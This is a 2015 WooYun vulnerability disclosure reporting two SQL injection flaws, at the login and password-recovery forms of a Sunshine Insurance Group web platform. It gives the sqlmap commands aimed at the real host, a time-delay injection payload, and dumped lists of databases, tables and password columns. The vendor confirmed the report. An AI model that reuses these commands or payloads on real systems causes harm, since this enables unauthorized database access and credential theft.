当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135489

漏洞标题:阳光保险集团某平台2处SQL注入

相关厂商:阳光保险集团

漏洞作者: 路人甲

提交时间:2015-08-20 09:55

修复时间:2015-10-04 10:12

公开时间:2015-10-04 10:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-20: 细节已通知厂商并且等待厂商处理中
2015-08-20: 厂商已经确认,细节仅向厂商公开
2015-08-30: 细节向核心白帽子及相关领域专家公开
2015-09-09: 细节向普通白帽子公开
2015-09-19: 细节向实习白帽子公开
2015-10-04: 细节向公众公开

简要描述:

如题

详细说明:

阳光保险集团云平台两处前台sql注入
1.注入点1:
登录处:

c:\Python27\sqlmap>sqlmap.py -u "http://ygjrex.sinosig.com/tabid/161/Default.aspx?returnurl=%2fdefault.aspx" --data="u_al=login&u_n=admin&u_p=admin123&u_r=0&_=0.33639599406160414" -p u_n


u_n参数存在延时注入

POST parameter 'u_n' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] N
sqlmap identified the following injection points with a total of 88 HTTP(s) requ
ests:
---
Parameter: u_n (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: u_al=login&u_n=admin';WAITFOR DELAY '0:0:5'--&u_p=admin123&u_r=0&_=
0.33639599406160414
---


2.注入点2:
找回密码处

sqlmap.py -u "http://ygjrex.sinosig.com/http://ygjrex.sinosig.com/tabid/193/Default.aspx" --data="actionType=ecode&email=a@a.com&surl=http://ygjrex.sinosig.com/?TabId=193" -p email


报错注入,可以快速提取数据

漏洞证明:

使用注入点2获取的少量信息:
数据库:

available databases [22]:
[*] fcdb
[*] km15b
[*] km_14
[*] km_15
[*] km_bjh
[*] km_gdym
[*] km_lhsz
[*] master
[*] meisizixun
[*] model
[*] msdb
[*] pfps
[*] pfps_cuspro
[*] pfps_customer
[*] pfps_plan
[*] pfpsata
[*] pfpsproduct
[*] tempdb
[*] water_crm
[*] waterh2_py
[*] ygbx
[*] zhongmeizhihui


表:

[221 tables]
+---------------------------------------------+
| Affiliates |
| AnonymousUsers |
| BRCB_APPDeviceInfo |
| BRCB_AccessroyPath |
| BRCB_Answer |
| BRCB_Attach |
| BRCB_Buffet |
| BRCB_CCUserInfo |
| BRCB_Category |
| BRCB_ClassInfo |
| BRCB_Class_User_Record |
| BRCB_Collect |
| BRCB_Comment |
| BRCB_Course |
| BRCB_CourseBox |
| BRCB_CourseQuestionInstance |
| BRCB_CourseRecord |
| BRCB_Department |
| BRCB_Dictionary |
| BRCB_ErrorQuestion |
| BRCB_Integral |
| BRCB_Log |
| BRCB_MobilePush |
| BRCB_MobileSuggest |
| BRCB_MobileVersion |
| BRCB_NewsMessage |
| BRCB_NewsMessageRecord |
| BRCB_Notice |
| BRCB_NoticeInfo |
| BRCB_NoticePush |
| BRCB_OrgPosition |
| BRCB_Organization |
| BRCB_Paper |
| BRCB_PaperInstance |
| BRCB_PaperInstance_Lastest |
| BRCB_PayRecord |
| BRCB_Question |
| BRCB_QuestionInstance |
| BRCB_Questionnaire |
| BRCB_QuestionnaireAnswer |
| BRCB_QuestionnaireQuestion |
| BRCB_QuestionnaireRecord |
| BRCB_R_Admin_User |
| BRCB_R_Attach_CCUserInfo |
| BRCB_R_Class_CourseBox |
| BRCB_R_Class_Paper |
| BRCB_R_Class_User |
| BRCB_R_Course_CourseBox |
| BRCB_R_Course_Question |
| BRCB_R_Course_User |
| BRCB_R_OrgPosition_CourseBox |
| BRCB_R_OrgPosition_Paper |
| BRCB_R_Paper_Question |
| BRCB_R_Paper_User |
| BRCB_R_UserGroup_CourseBox |
| BRCB_R_UserGroup_Paper |
| BRCB_R_User_CourseRating |
| BRCB_R_User_Group |
| BRCB_R_User_Questionnaire |
| BRCB_R_User_Region |
| BRCB_ShieldWords |
| BRCB_SystemAdmin |
| BRCB_SystemSetting |
| BRCB_User |
| BRCB_UserGroup |
| BRCB_UserMap |
| BRCB_VerifyCode |
| Banners |
| C_InfoCategory |
| C_InfoExtFiled |
| C_InfoExtValue |
| C_InfoItemRole |
| C_InfoModuleInfos |
| C_InfoPage |
| C_InfoSpec |
| C_InfoSpecInfo |
| C_InfoVersions |
| C_info |
| C_infoKeyword |
| C_infoLink |
| C_infoRemark |
| Classification |
| Client_View_BRCB_User_CourseBox_Course |
| Client_View_BRCB_User_TestPaper |
| DesktopModules |
| EventLog |
| EventLogConfig |
| EventLogTypes |
| Files |
| FolderPermission |
| Folders |
| HostSettings |
| HtmlText |
| Lists |
| ModuleControls |
| ModuleDefinitions |
| ModulePermission |
| ModuleSettings |
| Modules |
| MyDesktopLayout |
| Permission |
| PortalAlias |
| PortalDesktopModules |
| Portals |
| Profile |
| ProfilePropertyDefinition |
| RoleGroups |
| Roles |
| Schedule |
| ScheduleHistory |
| ScheduleItemSettings |
| SearchCommonWords |
| SearchIndexer |
| SearchItem |
| SearchItemWord |
| SearchItemWordPosition |
| SearchWord |
| SiteLog |
| Skins |
| SysDictionary |
| SystemMessages |
| TabModuleSettings |
| TabModules |
| TabPermission |
| Tabs |
| UManage_FavoriteCategory |
| UManage_MyFavorites |
| UrlLog |
| UrlTracking |
| Urls |
| UserPortals |
| UserProfile |
| UserRoles |
| Users |
| UsersOnline |
| VendorClassification |
| Vendors |
| Version |
| View_BECB_Questiong_ON_Category_PaperCount |
| View_BECB_R_Course_CourseBoxAndBRCB_Course |
| View_BRCB_Category_Statistics |
| View_BRCB_CourseAndBRCB_Category |
| View_BRCB_CourseBoxAndBRCB_Category |
| View_BRCB_CourseBox_Integration |
| View_BRCB_CourseKekan |
| View_BRCB_Department |
| View_BRCB_IntegralMore |
| View_BRCB_Organization |
| View_BRCB_PaperZhengchang |
| View_BRCB_Paper_ON_Category |
| View_BRCB_Paper_User_Assign_Record |
| View_BRCB_Question_ON_Category |
| View_BRCB_Question_ON_Paper |
| View_BRCB_R_Attach_CCUserInfo |
| View_BRCB_R_Course_QuestionAndBRCB_Question |
| View_BRCB_R_Course_UserAndBRCB_User |
| View_BRCB_R_OrgPosition_CourseBox |
| View_BRCB_R_OrgPosition_Paper |
| View_BRCB_R_UserGroup_CourseBox |
| View_BRCB_R_UserGroup_Paper |
| View_BRCB_R_User_Group |
| View_BRCB_StatisticsOrgCategoryCourse |
| View_BRCB_StatisticsOrgCategoryPaper |
| View_BRCB_StatisticsOrgCourse |
| View_BRCB_StatisticsOrgCourseCategoryRecord |
| View_BRCB_StatisticsOrgUserPaper |
| View_BRCB_StatisticsOrgUserRecord |
| View_BRCB_StatisticsUser |
| View_BRCB_Universal |
| View_BRCB_User |
| View_Category_CourseCount |
| View_Category_Indxe_StudyInfo |
| View_Collect_CourseBox |
| View_CourseBox_Distribution_Record |
| View_CourseRecord_LastTime |
| View_CourseSigned |
| View_NewMessage_Comment_Readed |
| View_NoticeInfo |
| View_Notice_And_Paperinstance_Coures |
| View_PaperListByQuestionId |
| View_Paper_R_User |
| View_TestCount |
| View_TopTenCourse |
| View_UserNewInfo |
| View_UserStatistics |
| View_User_R_Paper |
| WorkflowDef |
| aspnet_Applications |
| aspnet_Membership |
| aspnet_Profile |
| aspnet_Roles |
| aspnet_SchemaVersions |
| aspnet_Users |
| aspnet_UsersInRoles |
| provicetemp |
| sysdiagrams |
| tbl_province |
| vw_Client_CourseList |
| vw_Client_PackageList |
| vw_Client_UserPackageList |
| vw_CourseRecord |
| vw_FolderPermissions |
| vw_Lists |
| vw_ModulePermissions |
| vw_Modules |
| vw_Portals |
| vw_TabPermissions |
| vw_Tabs |
| vw_UManageFavorites |
| vw_UManageMyPublishArticles |
| vw_UManagePassedArticles |
| vw_UManageWaitAuditArticles |
| vw_Users |
| vw_aspnet_Applications |
| vw_aspnet_MembershipUsers |
| vw_aspnet_Profiles |
| vw_aspnet_Roles |
| vw_aspnet_Users |
| vw_aspnet_UsersInRoles |
| wfActive |
| wfTrace |
+---------------------------------------------+


查询出含有password列的表

Table: BRCB_UserMap
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| PassWord | nvarchar |
+----------+----------+
Database: ygbx
Table: vw_Users
[1 column]
+----------------+------+
| Column | Type |
+----------------+------+
| UpdatePassword | bit |
+----------------+------+
Database: ygbx
Table: aspnet_Membership
[10 columns]
+----------------------------------------+----------+
| Column | Type |
+----------------------------------------+----------+
| FailedPasswordAnswerAttemptCount | int |
| FailedPasswordAnswerAttemptWindowStart | datetime |
| FailedPasswordAttemptCount | int |
| FailedPasswordAttemptWindowStart | datetime |
| LastPasswordChangedDate | datetime |
| Password | nvarchar |
| PasswordAnswer | nvarchar |
| PasswordFormat | int |
| PasswordQuestion | nvarchar |
| PasswordSalt | nvarchar |
+----------------------------------------+----------+
Database: ygbx
Table: vw_Portals
[1 column]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| ProcessorPassword | nvarchar |
+-------------------+----------+
Database: ygbx
Table: Portals
[1 column]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| ProcessorPassword | nvarchar |
+-------------------+----------+
Database: ygbx
Table: vw_aspnet_MembershipUsers
[8 columns]
+----------------------------------------+----------+
| Column | Type |
+----------------------------------------+----------+
| FailedPasswordAnswerAttemptCount | int |
| FailedPasswordAnswerAttemptWindowStart | datetime |
| FailedPasswordAttemptCount | int |
| FailedPasswordAttemptWindowStart | datetime |
| LastPasswordChangedDate | datetime |
| PasswordAnswer | nvarchar |
| PasswordFormat | int |
| PasswordQuestion | nvarchar |
+----------------------------------------+----------+
Database: ygbx
Table: Users
[1 column]
+----------------+------+
| Column | Type |
+----------------+------+
| UpdatePassword | bit |
+----------------+------+

修复方案:

数据没拖,自行修复

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-08-20 10:11

厂商回复:

感谢提交,此站点未在公司机房,应该为分支部门自行搭建的应用,正在联系负责人

最新状态:

暂无